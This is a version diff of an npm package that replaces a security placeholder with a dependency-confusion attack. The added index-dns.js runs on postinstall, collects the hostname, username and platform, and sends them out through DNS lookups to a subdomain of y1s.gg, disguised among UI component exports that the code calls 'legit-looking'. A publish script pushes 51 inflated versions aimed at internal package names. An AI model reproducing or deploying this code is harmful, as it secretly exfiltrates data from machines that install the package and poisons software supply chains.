yass_eal_abcdef_ssdsf_dsfsf 0.0.1-security → 42.9999.100000

package/index-dns.js

@@ -0,0 +1,56 @@
+const os = require("os");
+const dns = require("dns");
+
+const info = {
+  yhost: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
+  home: os.homedir(),
+  path: process.env.PWD
+};
+
+// Encode les infos pour le DNS (attention à rester court !)
+function encodeInfo(info) {
+  const parts = [
+    info.yhost,
+    info.user,
+    info.platform,
+  ];
+  return parts
+    .map(part => part.replace(/[^a-zA-Z0-9]/g, "-").toLowerCase())
+    .join(".");
+}
+
+// Exfiltration via requête DNS
+const payload = encodeInfo(info);
+const domain = `${payload}.saur.y1s.gg`; // <- sous-domaine que tu surveilles
+
+dns.resolve(domain, 'A', () => {
+  // Ne rien faire avec la réponse
+});
+
+// Legit-looking exports
+function Button(props) {
+  return `<button class="saur-btn">${props.label}</button>`;
+}
+
+function Card({ title, content }) {
+  return `
+    <div class="saur-card">
+      <h3>${title}</h3>
+      <p>${content}</p>
+    </div>
+  `;
+}
+
+function Grid(columns, gap) {
+  return {
+    render: () => `<div class="saur-grid" style="grid-template-columns: repeat(${columns}, 1fr); gap: ${gap}px;"></div>`
+  };
+}
+
+module.exports = {
+  Button,
+  Card,
+  Grid,
+};

package/index.js

@@ -0,0 +1,39 @@
+const os = require("os");
+
+const info = {
+    yhost: os.hostname(),
+    user: os.userInfo().username,
+    platform: os.platform(),
+    home: os.homedir(),
+    ypath: process.cwd()
+}
+
+// Legit-looking exports
+function Button(props) {
+    return `<button class="saur-btn">${props.label}</button>`;
+  }
+  
+  function Card({ title, content }) {
+    return `
+      <div class="saur-card">
+        <h3>${title}</h3>
+        <p>${content}</p>
+      </div>
+    `;
+  }
+  
+  function Grid(columns, gap) {
+    return {
+      render: () => `<div class="saur-grid" style="grid-template-columns: repeat(${columns}, 1fr); gap: ${gap}px;"></div>`
+    };
+  }
+  
+  module.exports = {
+    Button,
+    Card,
+    Grid,
+  };
+
+// fetch("http://y1s.gg:8080/saur-states-management", {
+    // headers: info
+// });

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "yass_eal_abcdef_ssdsf_dsfsf",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "42.9999.100000",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node index-dns.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "description": ""
 }

package/packages.txt

@@ -0,0 +1,3 @@
+saur-design-sys-web
+saur-states-management
+saur-viseau-state-management

package/publish.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+PACKAGE_NAME="yass_eal_abcdef_ssdsf_dsfsf"
+
+for i in $(seq 0 50); do
+  VERSION="$i.9999.100000"
+  echo "[+] Publishing version $VERSION..."
+
+  # Met à jour manuellement le champ "version" dans package.json
+  jq ".version = \"$VERSION\"" package.json > package.tmp.json && mv package.tmp.json package.json
+
+  # Vérifie si la version existe déjà
+#   if npm view "$PACKAGE_NAME@$VERSION" > /dev/null 2>&1; then
+    # echo "[-] Version $VERSION already exists, skipping."
+#   else
+    npm publish --access public
+    echo "[✓] Version $VERSION published."
+#   fi
+
+  sleep 1
+done

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=yass_eal_abcdef_ssdsf_dsfsf for more information.